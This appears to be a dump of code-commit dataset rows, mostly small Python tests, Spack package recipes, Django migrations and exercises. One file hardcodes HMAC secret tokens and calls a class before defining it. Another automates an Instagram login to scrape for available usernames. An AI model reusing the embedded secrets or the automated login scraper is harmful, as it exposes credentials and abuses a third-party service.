""" Should return a list of css files that are relative to Core.path() """
assert ['jasmine.css'] == Core.css_files()
def test_favicon():
assert os.path.isfile(pkg_resources.resource_filename('jasmine_core.images', 'jasmine_favicon.png')) | mit | Python |
|
7b5b4fdf8d5801d6e87d1b39f46a5f868aa07110 | Add test | cupy/cupy,cupy/cupy,cupy/cupy,cupy/cupy | tests/cupy_tests/test_typing.py | tests/cupy_tests/test_typing.py | import cupy
class TestClassGetItem:
def test_class_getitem(self):
from typing import Any
cupy.ndarray[Any, Any]
| mit | Python |
|
a9609a500a65cc0efb787f5d90e164bd6fa48c1a | Print the left view of a BST | arunkumarpalaniappan/algorithm_tryouts | leftViewofBST.py | leftViewofBST.py | class BST:
def __init__(self,val):
self.left = None
self.right = None
self.data = val
def insertToBst(root,value):
if root is None:
root = value
else:
if value.data < root.data:
if root.left is None:
root.left = value
else:
insertToBst(root.left, value)
else:
if root.right is None:
root.right = value
else:
insertToBst(root.right, value)
def leftView(root,level,currentLevel):
if not root:
return
else:
if (currentLevel[0] < level):
print root.data
currentLevel[0] = level
leftView(root.left, level+1, currentLevel)
leftView(root.right, level+1, currentLevel)
tree = BST(5)
insertToBst(tree, BST(4))
insertToBst(tree, BST(6))
insertToBst(tree, BST(2))
insertToBst(tree, BST(1))
insertToBst(tree, BST(7))
insertToBst(tree, BST(8))
insertToBst(tree, BST(9))
insertToBst(tree, BST(10))
leftView(tree, 1, [0]) # => 5,4,2,1,9,10 ,O(n)
| mit | Python |
|
08e7103766ce684e849f23fac77792876fded586 | fix helper to use the actual lines form ceph.conf | guits/ceph-ansible,travmi/ceph-ansible,albertomurillo/ceph-ansible,jsaintrocc/ceph-ansible,WingkaiHo/ceph-ansible,albertomurillo/ceph-ansible,travmi/ceph-ansible,WingkaiHo/ceph-ansible,bengland2/ceph-ansible,fgal/ceph-ansible,guits/ceph-ansible,jsaintrocc/ceph-ansible,font/ceph-ansible,jtaleric/ceph-ansible,fgal/ceph-ansible,bengland2/ceph-ansible,font/ceph-ansible,ceph/ceph-ansible,jtaleric/ceph-ansible,ceph/ceph-ansible,WingkaiHo/ceph-ansible,albertomurillo/ceph-ansible | tests/functional/tests/mon/test_initial_members.py | tests/functional/tests/mon/test_initial_members.py | import pytest
uses_mon_initial_members = pytest.mark.skipif(
'mon_initial_members' not in pytest.config.slaveinput['node_config']['components'],
reason="only run in monitors configured with initial_members"
)
class TestMon(object):
def get_line_from_config(self, string, conf_path):
with open(conf_path) as ceph_conf:
ceph_conf_lines = ceph_conf.readlines()
for line in ceph_conf_lines:
if string in line:
return line
@uses_mon_initial_members
def test_ceph_config_has_inital_members_line(self, scenario_config):
cluster_name = scenario_config.get('ceph', {}).get('cluster_name', 'ceph')
ceph_conf_path = '/etc/ceph/%s.conf' % cluster_name
initial_members_line = self.get_line_from_config('mon initial members', ceph_conf_path)
assert initial_members_line
@uses_mon_initial_members
def test_initial_members_line_has_correct_value(self, scenario_config):
cluster_name = scenario_config.get('ceph', {}).get('cluster_name', 'ceph')
ceph_conf_path = '/etc/ceph/%s.conf' % cluster_name
initial_members_line = self.get_line_from_config('mon initial members', ceph_conf_path)
assert initial_members_line == 'mon initial members = mon0'
| import pytest
uses_mon_initial_members = pytest.mark.skipif(
'mon_initial_members' not in pytest.config.slaveinput['node_config']['components'],
reason="only run in monitors configured with initial_members"
)
class TestMon(object):
def get_line_from_config(self, string, conf_path):
with open(conf_path) as ceph_conf:
ceph_conf_lines = ceph_conf.readlines()
for line in ceph_conf:
if string in line:
return line
@uses_mon_initial_members
def test_ceph_config_has_inital_members_line(self, scenario_config):
cluster_name = scenario_config.get('ceph', {}).get('cluster_name', 'ceph')
ceph_conf_path = '/etc/ceph/%s.conf' % cluster_name
initial_members_line = self.get_line_from_config('mon_initial_members', ceph_conf_path)
assert initial_members_line
@uses_mon_initial_members
def test_initial_members_line_has_correct_value(self, scenario_config):
cluster_name = scenario_config.get('ceph', {}).get('cluster_name', 'ceph')
ceph_conf_path = '/etc/ceph/%s.conf' % cluster_name
initial_members_line = self.get_line_from_config('mon_initial_members', ceph_conf_path)
assert initial_members_line == 'mon_initial_members = mon0'
| apache-2.0 | Python |
5fad9d4fb60eb29d04d8d6a7fd967aad67ca28e2 | Create __init__.py | sheepeatingtaz/django-pagination-bootstrap,sheepeatingtaz/django-pagination-bootstrap,staticdev/django-pagination-bootstrap,staticdev/django-pagination-bootstrap | pagination_bootstrap/__init__.py | pagination_bootstrap/__init__.py | mit | Python |
||
379d2953c90610a48eb80d1cabedb63b8f948813 | Use `for_app` helper | scorphus/thefuck,mlk/thefuck,Clpsplug/thefuck,nvbn/thefuck,Clpsplug/thefuck,SimenB/thefuck,SimenB/thefuck,mlk/thefuck,scorphus/thefuck,nvbn/thefuck | thefuck/rules/fab_command_not_found.py | thefuck/rules/fab_command_not_found.py | from thefuck.utils import eager, get_closest, for_app
@for_app('fab')
def match(command):
return 'Warning: Command(s) not found:' in command.stderr
# We need different behavior then in get_all_matched_commands.
@eager
def _get_between(content, start, end=None):
should_yield = False
for line in content.split('\n'):
if start in line:
should_yield = True
continue
if end and end in line:
return
if should_yield and line:
yield line.strip().split(' ')[0]
def get_new_command(command):
not_found_commands = _get_between(
command.stderr, 'Warning: Command(s) not found:', 'Available commands:')
possible_commands = _get_between(
command.stdout, 'Available commands:')
script = command.script
for not_found in not_found_commands:
fix = get_closest(not_found, possible_commands)
script = script.replace(' {}'.format(not_found),
' {}'.format(fix))
return script
| from thefuck.utils import eager, get_closest
def match(command):
return (command.script_parts[0] == 'fab'
and 'Warning: Command(s) not found:' in command.stderr)
# We need different behavior then in get_all_matched_commands.
@eager
def _get_between(content, start, end=None):
should_yield = False
for line in content.split('\n'):
if start in line:
should_yield = True
continue
if end and end in line:
return
if should_yield and line:
yield line.strip().split(' ')[0]
def get_new_command(command):
not_found_commands = _get_between(
command.stderr, 'Warning: Command(s) not found:', 'Available commands:')
possible_commands = _get_between(
command.stdout, 'Available commands:')
script = command.script
for not_found in not_found_commands:
fix = get_closest(not_found, possible_commands)
script = script.replace(' {}'.format(not_found),
' {}'.format(fix))
return script
| mit | Python |
df777bf0771fdd8aadfbb26fe13b51692f4c161d | Add autogen package (#3542) | LLNL/spack,iulian787/spack,iulian787/spack,LLNL/spack,lgarren/spack,tmerrick1/spack,skosukhin/spack,EmreAtes/spack,TheTimmy/spack,matthiasdiener/spack,iulian787/spack,tmerrick1/spack,matthiasdiener/spack,TheTimmy/spack,mfherbst/spack,TheTimmy/spack,tmerrick1/spack,EmreAtes/spack,EmreAtes/spack,matthiasdiener/spack,iulian787/spack,skosukhin/spack,tmerrick1/spack,mfherbst/spack,skosukhin/spack,krafczyk/spack,TheTimmy/spack,mfherbst/spack,matthiasdiener/spack,TheTimmy/spack,krafczyk/spack,lgarren/spack,lgarren/spack,tmerrick1/spack,lgarren/spack,skosukhin/spack,skosukhin/spack,matthiasdiener/spack,lgarren/spack,LLNL/spack,LLNL/spack,krafczyk/spack,EmreAtes/spack,LLNL/spack,krafczyk/spack,EmreAtes/spack,iulian787/spack,mfherbst/spack,mfherbst/spack,krafczyk/spack | var/spack/repos/builtin/packages/autogen/package.py | var/spack/repos/builtin/packages/autogen/package.py | ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Autogen(AutotoolsPackage):
"""AutoGen is a tool designed to simplify the creation and maintenance of
programs that contain large amounts of repetitious text. It is especially
valuable in programs that have several blocks of text that must be kept
synchronized."""
homepage = "https://www.gnu.org/software/autogen/index.html"
url = "https://ftp.gnu.org/gnu/autogen/rel5.18.12/autogen-5.18.12.tar.gz"
list_url = "https://ftp.gnu.org/gnu/autogen"
list_depth = 2
version('5.18.12', '551d15ccbf5b5fc5658da375d5003389')
variant('xml', default=True, description='Enable XML support')
depends_on('pkg-config@0.9.0:', type='build')
depends_on('guile@1.8:2.0')
depends_on('libxml2', when='+xml')
def configure_args(self):
spec = self.spec
args = [
# `make check` fails without this
# Adding a gettext dependency does not help
'--disable-nls',
]
if '+xml' in spec:
args.append('--with-libxml2={0}'.format(spec['libxml2'].prefix))
else:
args.append('--without-libxml2')
return args
| lgpl-2.1 | Python |
|
cbbf9f34d08897358023078d81be3fa798601b02 | add the repl.py | mitodl/bootcamp-ecommerce,mitodl/bootcamp-ecommerce,mitodl/bootcamp-ecommerce,mitodl/bootcamp-ecommerce | repl.py | repl.py | #!/usr/bin/env python3
"""Run Django shell with imported modules"""
if __name__ == "__main__":
import os
if not os.environ.get("PYTHONSTARTUP"):
from subprocess import check_call
import sys
base_dir = os.path.dirname(os.path.abspath(__file__))
sys.exit(
check_call(
[os.path.join(base_dir, "manage.py"), "shell", *sys.argv[1:]],
env={**os.environ, "PYTHONSTARTUP": os.path.join(base_dir, "repl.py")},
)
)
# put imports here used by PYTHONSTARTUP
from django.conf import settings
for app in settings.INSTALLED_APPS:
try:
exec( # pylint: disable=exec-used
"from {app}.models import *".format(app=app)
)
except ModuleNotFoundError:
pass
| bsd-3-clause | Python |
|
21799cbe81c57f80f66cb5a90992d6ff66c31e2d | Create new package. (#5919) | LLNL/spack,tmerrick1/spack,tmerrick1/spack,tmerrick1/spack,lgarren/spack,lgarren/spack,lgarren/spack,iulian787/spack,LLNL/spack,iulian787/spack,iulian787/spack,matthiasdiener/spack,skosukhin/spack,krafczyk/spack,LLNL/spack,mfherbst/spack,lgarren/spack,matthiasdiener/spack,mfherbst/spack,iulian787/spack,LLNL/spack,skosukhin/spack,tmerrick1/spack,mfherbst/spack,EmreAtes/spack,skosukhin/spack,EmreAtes/spack,matthiasdiener/spack,mfherbst/spack,matthiasdiener/spack,tmerrick1/spack,EmreAtes/spack,krafczyk/spack,mfherbst/spack,matthiasdiener/spack,krafczyk/spack,skosukhin/spack,EmreAtes/spack,EmreAtes/spack,skosukhin/spack,LLNL/spack,iulian787/spack,krafczyk/spack,lgarren/spack,krafczyk/spack | var/spack/repos/builtin/packages/r-hmisc/package.py | var/spack/repos/builtin/packages/r-hmisc/package.py | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RHmisc(RPackage):
"""Contains many functions useful for data analysis, high-level
graphics, utility operations, functions for computing sample size
and power, importing and annotating datasets, imputing missing
values, advanced table making, variable clustering, character
string manipulation, conversion of R objects to LaTeX and html
code, and recoding variables."""
homepage = "http://biostat.mc.vanderbilt.edu/Hmisc"
url = "https://cran.rstudio.com/src/contrib/Hmisc_4.0-3.tar.gz"
list_url = "https://cran.r-project.org/src/contrib/Archive/Hmisc"
version('4.0-3', '7091924db1e473419d8116c3335f82da')
depends_on('r-lattice', type=('build', 'run'))
depends_on('r-survival', type=('build', 'run'))
depends_on('r-formula', type=('build', 'run'))
depends_on('r-ggplot2', type=('build', 'run'))
depends_on('r-latticeextra', type=('build', 'run'))
depends_on('r-acepack', type=('build', 'run'))
depends_on('r-gridextra', type=('build', 'run'))
depends_on('r-data-table', type=('build', 'run'))
depends_on('r-htmltools', type=('build', 'run'))
depends_on('r-base64enc', type=('build', 'run'))
depends_on('r-htmltable', type=('build', 'run'))
depends_on('r-viridis', type=('build', 'run'))
| lgpl-2.1 | Python |
|
cf7c33e3b3d733f24376badac70392ecb5f5a323 | add more tests | objectified/vdist,objectified/vdist | tests/test_build_definitions.py | tests/test_build_definitions.py | from vdist.builder import Build
from vdist.source import git, directory, git_directory
def test_build_projectroot_from_uri():
build = Build(
name='my build',
app='myapp',
version='1.0',
source=git(
uri='https://github.com/objectified/vdist',
branch='release-1.0'
),
profile='ubuntu-trusty'
)
assert build.get_project_root_from_source() == 'vdist'
def test_build_projectroot_from_directory():
build = Build(
name='my build',
app='myapp',
version='1.0',
source=directory(path='/var/tmp/vdist'),
profile='ubuntu-trusty'
)
assert build.get_project_root_from_source() == 'vdist'
def test_build_projectroot_from_git_directory():
build = Build(
name='my build',
app='myapp',
version='1.0',
source=git_directory(
path='/var/tmp/vdist',
branch='release-1.0'
),
profile='ubuntu-trusty'
)
assert build.get_project_root_from_source() == 'vdist'
def test_build_get_safe_dirname():
build = Build(
name='my build',
app='myapp-foo @#^&_',
version='1.0',
source=git_directory(
path='/var/tmp/vdist',
branch='release-1.0'
),
profile='ubuntu-trusty'
)
assert build.get_safe_dirname() == 'myapp-foo______-1.0-ubuntu-trusty'
| mit | Python |
|
e19097216c090c0e3f4b68c743d6427f012ab69e | Add migration for legislator change | texastribune/txlege84,texastribune/txlege84,texastribune/txlege84,texastribune/txlege84 | txlege84/legislators/migrations/0004_auto_20141201_1604.py | txlege84/legislators/migrations/0004_auto_20141201_1604.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('legislators', '0003_auto_20141120_1731'),
]
operations = [
migrations.AlterField(
model_name='legislator',
name='party',
field=models.ForeignKey(related_name='legislators', blank=True, to='legislators.Party', null=True),
preserve_default=True,
),
]
| mit | Python |
|
01327c49590641c8fe918d91a7877aa67fd56e88 | Add lc0172_factorial_trailing_zeroes.py | bowen0701/algorithms_data_structures | lc0172_factorial_trailing_zeroes.py | lc0172_factorial_trailing_zeroes.py | """Leetcode 172. Factorial Trailing Zeroes
Easy
URL: https://leetcode.com/problems/factorial-trailing-zeroes/
Given an integer n, return the number of trailing zeroes in n!.
Example 1:
Input: 3
Output: 0
Explanation: 3! = 6, no trailing zero.
Example 2:
Input: 5
Output: 1
Explanation: 5! = 120, one trailing zero.
Note: Your solution should be in logarithmic time complexity.
"""
class Solution(object):
def trailingZeroes(self, n):
"""
:type n: int
:rtype: int
"""
pass
def main():
pass
if __name__ == '__main__':
main()
| bsd-2-clause | Python |
|
6a9b224834d1a523b03ce1e7c6ff4fa3ccea2583 | Add tests for parse_utils.extract_tables. | MattOates/pgcli,lk1ngaa7/pgcli,suzukaze/pgcli,TamasNo1/pgcli,darikg/pgcli,nosun/pgcli,thedrow/pgcli,johshoff/pgcli,thedrow/pgcli,j-bennet/pgcli,nosun/pgcli,koljonen/pgcli,janusnic/pgcli,bitmonk/pgcli,w4ngyi/pgcli,bitemyapp/pgcli,yx91490/pgcli,TamasNo1/pgcli,zhiyuanshi/pgcli,koljonen/pgcli,j-bennet/pgcli,zhiyuanshi/pgcli,yx91490/pgcli,n-someya/pgcli,joewalnes/pgcli,stuartquin/pgcli,w4ngyi/pgcli,bitemyapp/pgcli,d33tah/pgcli,dbcli/pgcli,MattOates/pgcli,joewalnes/pgcli,janusnic/pgcli,n-someya/pgcli,suzukaze/pgcli,bitmonk/pgcli,dbcli/vcli,d33tah/pgcli,johshoff/pgcli,dbcli/pgcli,darikg/pgcli,dbcli/vcli,lk1ngaa7/pgcli | tests/test_parse_utils.py | tests/test_parse_utils.py | from pgcli.packages.parseutils import extract_tables
def test_simple_select_single_table():
tables = extract_tables('select * from abc')
assert tables == ['abc']
def test_simple_select_multiple_tables():
tables = extract_tables('select * from abc, def')
assert tables == ['abc', 'def']
def test_simple_select_with_cols_single_table():
tables = extract_tables('select a,b from abc')
assert tables == ['abc']
def test_simple_select_with_cols_multiple_tables():
tables = extract_tables('select a,b from abc, def')
assert tables == ['abc', 'def']
#def test_select_with_hanging_comma_single_table():
#tables = extract_tables('select a, from abc')
#assert tables == ['abc']
#def test_select_with_hanging_comma_multiple_tables():
#tables = extract_tables('select a, from abc, def')
#assert tables == ['abc']
#def test_simple_insert_single_table():
#tables = extract_tables('insert into abc (id, name) values (1, "def")')
#assert tables == ['abc']
| bsd-3-clause | Python |
|
897843932937faa841220cde90bdc89603d95615 | Solve hackerrank linked list problem | honux77/practice,honux77/practice,honux77/practice,honux77/practice,honux77/practice,honux77/practice,honux77/practice,honux77/practice,honux77/practice,honux77/practice,honux77/practice,honux77/practice,honux77/practice | hackerrank/linked-list/dedup.py | hackerrank/linked-list/dedup.py | # https://www.hackerrank.com/challenges/delete-duplicate-value-nodes-from-a-sorted-linked-list/problem
def RemoveDuplicates(head):
if head is None:
return None
curr = head
while curr.next is not None:
currentData = curr.data
next = curr.next;
nextData = next.data
if currentData == nextData:
curr.next = curr.next.next
else:
curr = curr.next
return head | mit | Python |
|
7a25a38d7b53da6aadf5b0d45aa9aefdb639ae81 | Add python sample library | hughdavenport/rails-hmac-api,hughdavenport/rails-hmac-api,hughdavenport/rails-hmac-api,hughdavenport/rails-hmac-api | test.py | test.py | from datetime import datetime
from time import mktime
from wsgiref.handlers import format_date_time
from requests.auth import AuthBase
from base64 import b64encode
from urllib import urlencode
from urlparse import urlparse, parse_qs, ParseResult
import re
import requests
import hashlib
import hmac
public_token = "Ch7/DHoFIdIDaX5m4mqGxQ=="
secret_token = "6Ql2ZXcYqOGLdwwdWbcnCJq0N32hX8NA6AWr6wewx/T+oLcWOuynddnrETxkP9cHB7jXNs09NL3vY/BGeDxxWw=="
auth = HMACAuth(public_token, secret_token)
hostname = "localhost"
port = "3000"
https = False
base_endpoint = "api"
api_base = "http%s://%s%s/%s" % ("s" if https else "", hostname, ":" + port if port else "", base_endpoint)
class HMACAuth(AuthBase):
def __init__(self, public_token, secret_token):
self.public_token = public_token
self.secret_token = secret_token
def __call__(self, r):
self.add_auth_header(r)
return r
def add_auth_header(self, r):
r.headers['Authorization'] = self.auth_header(r)
def auth_header(self, r):
return "APIAuth %s:%s" % (self.public_token, self.hmac_signature(r))
def hmac_signature(self, r):
return b64encode(hmac.new(self.secret_token, self.canonical_string(r), hashlib.sha1).digest())
def canonical_string(self, r):
return ",".join([
# self.method(r),
self.content_type(r),
self.content_md5(r),
self.uri(r),
self.date(r)
])
def find_header(self, r, l):
for header in l:
for key, value in r.headers.iteritems():
if key.upper() == header:
return value
return ""
def method(self, r):
return r.method.upper()
def content_type(self, r):
return self.find_header(r, "CONTENT-TYPE CONTENT_TYPE HTTP_CONTENT_TYPE".split())
def content_md5(self, r):
md5 = self.find_header(r, "CONTENT-MD5 CONTENT_MD5".split())
if not md5 and self.method(r) in "POST PUT".split():
md5 = self.add_content_md5_header(r)
return md5
def uri(self, r):
url = re.sub(r'https?://[^,?/]*', '', r.url)
return url if url else "/"
def date(self, r):
date = self.find_header(r, "DATE HTTP_DATE".split())
if not date:
date = self.add_date_header(r)
return date
def add_content_md5_header(self, r):
m = hashlib.md5()
m.update(r.body if r.body else "")
md5 = m.hexdigest()
r.headers['Content-MD5'] = md5
return md5
def add_date_header(self, r):
date = format_date_time(mktime(datetime.now().timetuple()))
r.headers['Date'] = date
return date
def last_nonce():
return int(requests.get("%s/last_nonce" % (api_base), auth=auth).text)
def add_nonce(url):
nonce = last_nonce() + 1
uri = urlparse(url)
query = parse_qs(uri.query)
if 'nonce' in query:
del query['nonce']
query['nonce'] = nonce
query = urlencode(query, True)
return ParseResult(uri.scheme, uri.netloc, uri.path, uri.params, query, uri.fragment).geturl()
url = "%s/test" % (api_base)
r = requests.get(add_nonce(url), auth=auth)
print r.text
| mit | Python |
|
b3a20379162a068cc8f9a0f314a21a46ec40e4c6 | Add simple unit test for snapshot iteration class | micxer/fix-time-machine-freenas | test.py | test.py | #!/usr/bin/env python
import unittest
from fix_time_machine_backup import SnapshotList
class TestSnapshotList(unittest.TestCase):
def setUp(self):
self.snapshot_list = SnapshotList([
'auto-20160820.2103-2m',
'auto-20160821.0003-2m',
'auto-20160821.1503-2m',
'auto-20160821.2303-2m',
'auto-20160823.1003-2m',
'auto-20160825.1003-2m',
'auto-20160827.0003-2m',
'auto-20160827.1003-2m',
'auto-20160828.0603-2m',
])
def test_get_next_snapshot(self):
self.assertEqual(self.snapshot_list.get_current_snapshot(), 'auto-20160828.0603-2m')
self.assertEqual(self.snapshot_list.get_next_snapshot(), 'auto-20160821.0003-2m')
if __name__ == '__main__':
unittest.main() | bsd-3-clause | Python |
|
aaea97c5cab778174b45cb2557d819deb769a45e | Create instagram_checker.py | AlanBaumgartner/instagram_checker | instagram_checker.py | instagram_checker.py | import requests, argparse, sys
class checker:
def __init__(self):
#Declare some variables
self.headers = {'User-agent': 'Mozilla/5.0'}
self.loginurl = 'https://www.instagram.com/accounts/login/ajax/'
self.url = 'https://www.instagram.com/'
#Start a session and update headers
self.s = requests.session()
self.s.headers.update(self.headers)
#Gets username, password, textfile to check usernames, and output file for available usernames.
parser = argparse.ArgumentParser()
parser.add_argument("-u", dest='username', help="Instagram username",
action="store")
parser.add_argument("-p", dest='password', help="Instagram password",
action="store")
parser.add_argument("-i", dest='inputf', help="Textfile with usernames",
action="store")
parser.add_argument("-o", dest='outputf', help="Output textfile",
action="store")
args = parser.parse_args()
#Save variables from argparse
self.username = args.username
self.password = args.password
self.inputf = args.inputf
self.outputf = args.outputf
def login(self, username, password):
#Logs into instagram
loginRequest = self.s.post(
self.loginurl,
headers={
'x-csrftoken': self.s.get(self.url).text.split('csrf_token": "')[1].split('"')[0],
'x-instagram-ajax':'1',
'x-requested-with': 'XMLHttpRequest',
'Origin': self.url,
'Referer': self.url,
},
data={
'username':username,
'password':password,
}
)
if loginRequest.json()['authenticated']:
print('Logged In.')
else:
sys.exit("Login Failed, closing program.")
def get_usernames(self, filename):
#Gets username from file
with open(filename, "r") as f:
usernames = f.read().split("\n")
return usernames
def check_usernames(self, username, output):
#checks username and saves available usernames to new file
for user in usernames:
r = self.s.get(self.url+user)
al = r.text
text = al[al.find('<title>') + 7 :al.find('</title>')]
if "Page Not Found" in text:
with open(output, "a") as a:
a.write(user+'\n')
if __name__ == "__main__":
check = checker()
check.login(check.username, check.password)
#Clears output file for new usernames
with open(check.outputf, "w") as a:
print('Output file cleared.')
usernames = check.get_usernames(check.inputf)
check.check_usernames(usernames, check.outputf)
| mit | Python |
|
16aa4a292fafa2a74f668a56c5cf1a66f923df24 | Make src.cm.tools a package | cc1-cloud/cc1,cc1-cloud/cc1,cc1-cloud/cc1,cc1-cloud/cc1 | src/cm/tools/__init__.py | src/cm/tools/__init__.py | """@package cm.tools
@date Jun 6, 2014
@author Zosia Sobocińska
"""
| apache-2.0 | Python |
|
519d6052e3bf16c8028d39eab374cd2aa17ffd4e | add position field to user committee | dhosterman/hebrew_order_david,dhosterman/hebrew_order_david,dhosterman/hebrew_order_david | application/migrations/0014_usercommittee_position.py | application/migrations/0014_usercommittee_position.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('application', '0013_auto_20150313_2126'),
]
operations = [
migrations.AddField(
model_name='usercommittee',
name='position',
field=models.CharField(max_length=255, default=''),
preserve_default=False,
),
]
| mit | Python |
|
557b0f30e0180a526433b65915d2a137144f2f05 | add test_logger.py | alphatwirl/alphatwirl,alphatwirl/alphatwirl,alphatwirl/alphatwirl,alphatwirl/alphatwirl | tests/unit/test_logger.py | tests/unit/test_logger.py | # Tai Sakuma <tai.sakuma@gmail.com>
import logging
import alphatwirl
##__________________________________________________________________||
def test_logger_exist():
assert 'alphatwirl' in logging.Logger.manager.loggerDict
def test_len_handlers():
logger = logging.getLogger('alphatwirl')
assert len(logger.handlers) >= 1
##__________________________________________________________________||
def test_example():
logger_names = logging.Logger.manager.loggerDict.keys()
loglevel_dict = {l: logging.getLogger(l).getEffectiveLevel() for l in logger_names}
# a dict of names and levels of loggers
# e.g.,
# {
# 'alphatwirl': 40,
# 'alphatwirl.delphes': 40,
# 'alphatwirl.loop': 40,
# 'pandas': 0,
# }
#
# https://docs.python.org/3/library/logging.html#logging-levels
# Level Numeric value
# CRITICAL 50
# ERROR 40
# WARNING 30
# INFO 20
# DEBUG 10
# NOTSET 0
##__________________________________________________________________||
| bsd-3-clause | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.